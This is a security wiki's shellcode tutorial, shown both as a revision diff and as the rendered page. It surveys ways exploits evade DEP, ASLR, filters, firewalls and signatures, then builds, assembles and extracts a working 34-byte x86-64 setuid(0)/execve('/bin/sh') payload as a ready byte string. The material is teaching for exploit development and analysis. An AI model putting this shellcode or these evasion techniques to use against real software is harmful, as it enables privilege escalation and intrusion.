Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "Category:Shellcode"

From NetSec
Jump to: navigation, search
Line 1: Line 1:
'''Shellcode''', also known as '''bytecode''', is [[assembly]] which has been translated into properly formatted [[machine code]] ([[binary]] represented in [[hexadecimal]]) for use during [[buffer overflow]] [[exploitation]].  [[Machine code]] can be used by a [[programmer]] to write any application from an [[assembly]] approach because it is just as powerful as any other [[programming language]].
+
'''Shellcode''', also known as '''bytecode''', is [[machine code]] ([[binary]] represented in [[hexadecimal]]) which can be used for [[buffer overflow]] [[exploitation]], and is usually represented to humans in [[assembly]].  [[Machine code]] can be used by a [[programmer]] to write any application from an [[assembly]] approach (as it is just as powerful as any other [[programming language]]), though unlike other languages it is usually ([[#x86.2Fx64_GetCPU_.28any_OS.29|but not always]]) limited to a single [[operating system]] and [[instruction set architecture]]. 
  
:Every [[programming language]] eventually becomes [[binary]], whether at ''compile-time'' or ''runtime''.  When writing a [[Buffer Overflows|buffer overflow]] there are many obstructions from [[SIM|security infrastructure]], such as [[DEP]], [[ASLR]], [[firewall|firewalls]], or [[IDS]] and [[IPS]] appliances, thus many [[filter bypass]] and [[IDS evasion]] techniques (such as [[alphanumeric shellcode]]) must be utilized for successful [[exploitation]] in modern environments in conjunction with [[anti-heuristics]] and [[shellcode obfuscation|obfuscation]] for maximum effectiveness.  There are primarily two types of shellcode: ''executable'' shellcode and ''return-oriented'' shellcode.
+
{{prereq|[[bitwise math]], [[linux assembly]], and [[buffer overflow|stack overflows]]}}
  
 +
== Introduction ==
 +
Every [[programming language]] is eventually expressed in [[binary]], either at ''[[Compiled languages|compile-time]]'' or ''[[Interpreted languages|runtime]]''.  When writing a [[Buffer Overflows|buffer overflow]] there are many potential obstructions from [[SIM|security infrastructures]] (such as [[DEP]], [[ASLR]], [[firewall|firewalls]], or [[IDS]] and [[IPS]] appliances) to keep in mind, as many [[filter bypass]] and [[IDS evasion]] techniques may need to be utilized for successful [[exploitation]] past modern [[countermeasures]].
  
'''Executable shellcode''' is typically translated from [[assembly]] written for its respective target [[Operating System]].
+
This article assumes that the user has access to some form of [[Linux]] or Unix [[bash]] environment with the standard GNU core utilities installed.  In some cases, stub examples can be tested or used using OllyDBG or IDA pro.  Throughout the article are small snippets of code taken from the examples found in [[Shellcode/Appendix|the appendix]]; alternatively, shellcode and associated object files in this article are also contained in [[shellcodecs]].
  
:* Basic executable shellcode, or traditional [[null-free shellcode]] can be used on any vulnerable application (sans filters) with an executable stack.   
+
== Types of shellcode ==
:* 32-bit [[ascii shellcode]] and 64-bit [[alphanumeric shellcode]] are commonly used for filter bypass and IDS evasion.
+
Many different types of shellcode may be utilized depending on the target environment for the execution of the codeDifferent types of [[countermeasures]] at different levels of the OSI model require different techniques for successful [[exploitation]] of a given [[application]]'s [[vulnerability]].
  
'''Return oriented shellcode''' utilizes [[Return_Oriented_Programming_(ROP)|return oriented programming]] in cases when the vulnerable buffer is non-executable, bypassing the need for an executable stack.
+
=== Executable vs. Return-oriented ===
 +
There are primarily two types of shellcode from a runtime perspective: ''executable'' shellcode and ''return-oriented'' shellcode. The type required for successful exploitation is dictated by the target environment's ability to execute a data stack.  If properly targetted, return oriented shellcode should work regardless of the stack's ability to execute, while executable shellcode will work exclusively on executable stacks.
 +
 
 +
 
 +
* '''Executable shellcode''' is typically translated from [[assembly]] written for its respective target [[Operating System]]. Most basic executable shellcodes, or traditional [[null-free shellcode]]s can be used on any vulnerable application ([[unsanitized|sans filters]]) with an executable stack.
 +
 
 +
 
 +
* '''Return oriented shellcode''' utilizes [[Return_Oriented_Programming_(ROP)|return oriented programming]] in cases when the vulnerable buffer is non-executable.  This is usually performed by constructing a [[call stack]] formatted in a similar fashion to that generated by an ordinary [[compiled language|compiled]] [[application]] which then triggers the execution of executable shellcode.  Because the [[call stack]] is treated as data, this bypasses the need for an executable stack during [[exploitation]].
 +
 
 +
 
 +
{{info|Certain [[instruction set architecture]]s, such as '''MIPS''', are not [[vulnerability|vulnerable]] to [[Return_Oriented_Programming_(ROP)|return oriented programming]] or traditional [[buffer overflow|stack overflows]] due to the fact that they do not store the [[return address]]es to functions in the stack.}}
 +
 
 +
=== [[Countermeasures]] and environmental hostility ===
 +
While traditional [[binary]] shellcodes will normally work unincumbered for [[unsanitized]], [[unpatched]], or larger [[input]]s, many target environments and applications may have a variety of limiting factors that serve as obstacles to traditional [[machine code]].  Most [[application]]s written in [[C]] or [[C++]] will require that the [[machine code]] be null-free, which is why [[null-free shellcode]] is the traditional basic form of executable shellcode [[programming]].
 +
 
 +
* Character filters can be evaded by utilizing [[polymorphic]] ([[#Self-modifying code|self-modifying code]]) to reconstruct bytecode outside of the allowed character set during runtime.  Most character filters restrict characters to the printable keyspace, and so [[ascii shellcode]] and [[alphanumeric shellcode]] have become prevalent means of circumventing them.
 +
 
 +
* Character encoding can be bypassed by encoding the payload so that it will decode to the proper [[hexadecimal]] [[machine code]].  It is often that code will have to survive unicode, base64, case conversions, or other decoding before being copied into the vulnerable [[buffer]].
 +
 
 +
* [[Buffer]] size may be incredibly limited and can require ''second-order-injection'' in circumstances which the payload is too large to fit into the [[vulnerability|vulnerable]] [[buffer]].  As a result, a shellcode's size is traditionally kept to a minimum for optimal re-usability.
 +
 
 +
* [[Firewall]]s can obstruct remote shellcodes by preventing new outbound connections from being formed or preventing new listening sockets from receiving traffic.  [[#Bypassing firewalls|Bypassing firewalls]] has been accomplished by utilizing ''file-descriptor re-use''.
 +
 
 +
* Analysts may be [[debugging]] the vulnerable [[application]] in attempt to reverse engineer the [[exploitation]] process, [[int3 breakpoint detection]] and one-way hashing are demonstrated to evade volatile forensic analysis tools (such as volatility) .
 +
 
 +
* Signatures usually get in the way with [[Linux]] shellcode particularly due to the fact that syscalls are traditionally used to interface with the [[C]] calling convention, thus the most static part of any given shellcode with a [[C]] interface.  Even [[polymorphic]] codes usually unpack into shellcodes containing syscalls.  Syscalls can be removed using [[#Runtime_linking_.28syscall_removal.29|self-linking code]].
 +
 
 +
== Shellcode mechanics ==
 +
 
 +
Shellcode is usually written first in [[assembly]] language.  While it is possible for one to memorize an opcode table and write direct [[machine code]] by hand, this is not usually suitable for beginners and therefore is not recommended. 
 +
 
 +
''Environmental factors''
 +
:* Many [[application]]s and [[SIM|security infrastructure]] components will partially [[Sanitize|filter inputs]], restricting the possible instruction set.  Sometimes this will even interfere when overwriting the [[return address]] during exploitation.
 +
 
 +
:* [[Operating system]]s handle the [[C]] [[API]] a bit differently.  Normally ([[Shellcode/Dynamic|but not always]]) shellcode for [[Linux]] relies on kernel interrupts for unlinked calls, while Microsoft Windows does not provide an interrupt API and shellcode must therefore utilize PE parsing to perform its own linking at runtime.
 +
 
 +
=== Assembling the code ===
 +
 
 +
Create a text file named '''test_shellcode.s'''. 
 +
 
 +
This example will use [[User:Hatter|hatter]]'s null-free 34-byte payload for '''setuid(0); execve('/bin/sh',null,null)'''.  Copy the following code into '''test_shellcode.s''', then save it:
 +
{{code|text=<source lang="asm">
 +
.text
 +
.globl _start
 +
_start:
 +
  xor %rdi, %rdi                # Zero out %rdi (first argument)
 +
  push $0x69
 +
  pop %rax                      # Set %rax to function number for setuid()
 +
  syscall                        # setuid(0);
 +
 
 +
 
 +
  push %rdi                     
 +
  push %rdi
 +
  pop %rsi                   
 +
  pop %rdx                      # Null out %rdx and %rdx (second and third argument)
 +
  mov $0x68732f6e69622f6a,%rdi  # move 'hs/nib/j' into %rdi
 +
  shr $0x8,%rdi                  # null truncate the backwards value to '\0hs/nib/'
 +
  push %rdi     
 +
  push %rsp
 +
  pop %rdi                      # %rdi is now a pointer to '/bin/sh\0'
 +
  push $0x3b                   
 +
  pop %rax                      # set %rax to function # for execve()
 +
  syscall                        # execve('/bin/sh',null,null);
 +
</source>}}
 +
 
 +
''When creating shellcode on a [[Linux]] platform, the source file can be assembled using the GNU assembler:''
 +
{{LinuxCMD|as test_shellcode.s -o test_shellcode.o}}
 +
 
 +
=== Extracting the shellcode ===
 +
 
 +
''Once the shellcode has been assembled, it is possible to turn this into bytecode using the [[Linux]] [[binary]] object dumper:''
 +
{{LinuxCMD|objdump -d test_shellcode.o}}
 +
 
 +
The middle column contains the byte instructions corresponding to the [[assembly]] on that line.  Most debuggers also show a [[hexadecimal]] representation corresponding with the assembly of the debugged [[application]], in this case:
 +
 
 +
{{code|text=
 +
user@host:~$ objdump -d test_shellcode.o
 +
 
 +
test_shellcode.o:    file format elf64-x86-64
 +
 
 +
 
 +
Disassembly of section .text:
 +
 
 +
0000000000000000 <_start>:<source lang="asm">
 +
  0: 48 31 ff            xor    %rdi,%rdi
 +
  3: 6a 69                pushq  $0x69
 +
  5: 58                  pop    %rax
 +
  6: 0f 05                syscall
 +
  8: 57                  push  %rdi
 +
  9: 57                  push  %rdi
 +
  a: 5e                  pop    %rsi
 +
  b: 5a                  pop    %rdx
 +
  c: 48 bf 6a 2f 62 69 6e movabs $0x68732f6e69622f6a,%rdi
 +
  13: 2f 73 68
 +
  16: 48 c1 ef 08          shr    $0x8,%rdi
 +
  1a: 57                  push  %rdi
 +
  1b: 54                  push  %rsp
 +
  1c: 5f                  pop    %rdi
 +
  1d: 6a 3b                pushq  $0x3b
 +
  1f: 58                  pop    %rax
 +
  20: 0f 05                syscall
 +
</source>}}
 +
 
 +
The [[hexadecimal]] in the middle column is the bytecode for the executable segment.  To make this into "shellcode", place a ''\x'' prefix before each [[byte]], like so:
 +
::'''\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'''
 +
 
 +
If it is desirable, it can be turned directly into [[binary]] using [[perl]]'s print statement, "echo -en" in [[bash]], or other [[interpreted languages|interpreted language]].
 +
 
 +
=== Shellcode Disassembly ===
 +
Many times you may come across shellcode in the wild, for example when analyzing malware or the newest exploit. You may want to disassemble the shellcode to learn what it does, the easiest way to do this is with objdump. In this example we'll use the example code which we just constructed, the shortest 64-bit setuid() shell online:
 +
 
 +
  ╭─user@host ~ 
 +
  ╰─➤  echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" >
 +
  shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode
 +
  shellcode:    file format binary
 +
  Disassembly of section .data:
 +
  00000000 <.data>:
 +
    0: 48 31 ff            xor    %rdi,%rdi
 +
    3: 6a 69                pushq  $0x69
 +
    5: 58                  pop    %rax
 +
    6: 0f 05                syscall
 +
    8: 57                  push  %rdi
 +
    9: 57                  push  %rdi
 +
    a: 5e                  pop    %rsi
 +
    b: 5a                  pop    %rdx
 +
    c: 48 bf 6a 2f 62 69 6e movabs $0x68732f6e69622f6a,%rdi
 +
  13: 2f 73 68
 +
  16: 48 c1 ef 08          shr    $0x8,%rdi
 +
  1a: 57                  push  %rdi
 +
  1b: 54                  push  %rsp
 +
  1c: 5f                  pop    %rdi
 +
  1d: 6a 3b                pushq  $0x3b
 +
  1f: 58                  pop    %rax
 +
  20: 0f 05                syscall
 +
  ╭─user@host ~ 
 +
  ╰─➤
  
  
 
{{programming}}{{exploitation}}{{social}}
 
{{programming}}{{exploitation}}{{social}}
 
<br />
 
<br />

Revision as of 04:46, 1 December 2012

Shellcode, also known as bytecode, is machine code (binary represented in hexadecimal) which can be used for buffer overflow exploitation, and is usually represented to humans in assembly. Machine code can be used by a programmer to write any application from an assembly approach (as it is just as powerful as any other programming language), though unlike other languages it is usually (but not always) limited to a single operating system and instruction set architecture.

Shellcode requires a basic understanding of bitwise math, linux assembly, and stack overflows


Introduction

Every programming language is eventually expressed in binary, either at compile-time or runtime. When writing a buffer overflow there are many potential obstructions from security infrastructures (such as DEP, ASLR, firewalls, or IDS and IPS appliances) to keep in mind, as many filter bypass and IDS evasion techniques may need to be utilized for successful exploitation past modern countermeasures.

This article assumes that the user has access to some form of Linux or Unix bash environment with the standard GNU core utilities installed. In some cases, stub examples can be tested or used using OllyDBG or IDA pro. Throughout the article are small snippets of code taken from the examples found in the appendix; alternatively, shellcode and associated object files in this article are also contained in shellcodecs.

Types of shellcode

Many different types of shellcode may be utilized depending on the target environment for the execution of the code. Different types of countermeasures at different levels of the OSI model require different techniques for successful exploitation of a given application's vulnerability.

Executable vs. Return-oriented

There are primarily two types of shellcode from a runtime perspective: executable shellcode and return-oriented shellcode. The type required for successful exploitation is dictated by the target environment's ability to execute a data stack. If properly targetted, return oriented shellcode should work regardless of the stack's ability to execute, while executable shellcode will work exclusively on executable stacks.



  • Return oriented shellcode utilizes return oriented programming in cases when the vulnerable buffer is non-executable. This is usually performed by constructing a call stack formatted in a similar fashion to that generated by an ordinary compiled application which then triggers the execution of executable shellcode. Because the call stack is treated as data, this bypasses the need for an executable stack during exploitation.


c3el4.png Certain instruction set architectures, such as MIPS, are not vulnerable to return oriented programming or traditional stack overflows due to the fact that they do not store the return addresses to functions in the stack.

Countermeasures and environmental hostility

While traditional binary shellcodes will normally work unincumbered for unsanitized, unpatched, or larger inputs, many target environments and applications may have a variety of limiting factors that serve as obstacles to traditional machine code. Most applications written in C or C++ will require that the machine code be null-free, which is why null-free shellcode is the traditional basic form of executable shellcode programming.

  • Character encoding can be bypassed by encoding the payload so that it will decode to the proper hexadecimal machine code. It is often that code will have to survive unicode, base64, case conversions, or other decoding before being copied into the vulnerable buffer.
  • Buffer size may be incredibly limited and can require second-order-injection in circumstances which the payload is too large to fit into the vulnerable buffer. As a result, a shellcode's size is traditionally kept to a minimum for optimal re-usability.
  • Firewalls can obstruct remote shellcodes by preventing new outbound connections from being formed or preventing new listening sockets from receiving traffic. Bypassing firewalls has been accomplished by utilizing file-descriptor re-use.
  • Signatures usually get in the way with Linux shellcode particularly due to the fact that syscalls are traditionally used to interface with the C calling convention, thus the most static part of any given shellcode with a C interface. Even polymorphic codes usually unpack into shellcodes containing syscalls. Syscalls can be removed using self-linking code.

Shellcode mechanics

Shellcode is usually written first in assembly language. While it is possible for one to memorize an opcode table and write direct machine code by hand, this is not usually suitable for beginners and therefore is not recommended.

Environmental factors

  • Operating systems handle the C API a bit differently. Normally (but not always) shellcode for Linux relies on kernel interrupts for unlinked calls, while Microsoft Windows does not provide an interrupt API and shellcode must therefore utilize PE parsing to perform its own linking at runtime.

Assembling the code

Create a text file named test_shellcode.s.

This example will use hatter's null-free 34-byte payload for setuid(0); execve('/bin/sh',null,null). Copy the following code into test_shellcode.s, then save it:

 
.text
.globl _start
_start:
  xor %rdi, %rdi                 # Zero out %rdi (first argument)
  push $0x69
  pop %rax                       # Set %rax to function number for setuid()
  syscall                        # setuid(0);
 
 
  push %rdi                      
  push %rdi
  pop %rsi                     
  pop %rdx                       # Null out %rdx and %rdx (second and third argument)
  mov $0x68732f6e69622f6a,%rdi   # move 'hs/nib/j' into %rdi
  shr $0x8,%rdi                  # null truncate the backwards value to '\0hs/nib/'
  push %rdi      
  push %rsp 
  pop %rdi                       # %rdi is now a pointer to '/bin/sh\0'
  push $0x3b                     
  pop %rax                       # set %rax to function # for execve()
  syscall                        # execve('/bin/sh',null,null);
 

When creating shellcode on a Linux platform, the source file can be assembled using the GNU assembler:

Terminal

localhost:~ $ as test_shellcode.s -o test_shellcode.o

Extracting the shellcode

Once the shellcode has been assembled, it is possible to turn this into bytecode using the Linux binary object dumper:

Terminal

localhost:~ $ objdump -d test_shellcode.o

The middle column contains the byte instructions corresponding to the assembly on that line. Most debuggers also show a hexadecimal representation corresponding with the assembly of the debugged application, in this case:

user@host:~$ objdump -d test_shellcode.o

test_shellcode.o: file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <_start>:
 
   0:	48 31 ff             	xor    %rdi,%rdi
   3:	6a 69                	pushq  $0x69
   5:	58                   	pop    %rax
   6:	0f 05                	syscall 
   8:	57                   	push   %rdi
   9:	57                   	push   %rdi
   a:	5e                   	pop    %rsi
   b:	5a                   	pop    %rdx
   c:	48 bf 6a 2f 62 69 6e 	movabs $0x68732f6e69622f6a,%rdi
  13:	2f 73 68 
  16:	48 c1 ef 08          	shr    $0x8,%rdi
  1a:	57                   	push   %rdi
  1b:	54                   	push   %rsp
  1c:	5f                   	pop    %rdi
  1d:	6a 3b                	pushq  $0x3b
  1f:	58                   	pop    %rax
  20:	0f 05                	syscall 
 

The hexadecimal in the middle column is the bytecode for the executable segment. To make this into "shellcode", place a \x prefix before each byte, like so:

\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05

If it is desirable, it can be turned directly into binary using perl's print statement, "echo -en" in bash, or other interpreted language.

Shellcode Disassembly

Many times you may come across shellcode in the wild, for example when analyzing malware or the newest exploit. You may want to disassemble the shellcode to learn what it does, the easiest way to do this is with objdump. In this example we'll use the example code which we just constructed, the shortest 64-bit setuid() shell online:

 ╭─user@host ~  
 ╰─➤  echo -en "\x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05" > 
 shellcode; objdump -b binary -m i386 -M x86-64 -D shellcode
 shellcode:     file format binary
 Disassembly of section .data:
 00000000 <.data>:
   0:	48 31 ff             	xor    %rdi,%rdi
   3:	6a 69                	pushq  $0x69
   5:	58                   	pop    %rax
   6:	0f 05                	syscall 
   8:	57                   	push   %rdi
   9:	57                   	push   %rdi
   a:	5e                   	pop    %rsi
   b:	5a                   	pop    %rdx
   c:	48 bf 6a 2f 62 69 6e 	movabs $0x68732f6e69622f6a,%rdi
  13:	2f 73 68 
  16:	48 c1 ef 08          	shr    $0x8,%rdi
  1a:	57                   	push   %rdi
  1b:	54                   	push   %rsp
  1c:	5f                   	pop    %rdi
  1d:	6a 3b                	pushq  $0x3b
  1f:	58                   	pop    %rax
  20:	0f 05                	syscall 
 ╭─user@host ~  
 ╰─➤


Shellcode is part of a series on programming.
<center>
Shellcode is part of a series on exploitation.
<center>

</center>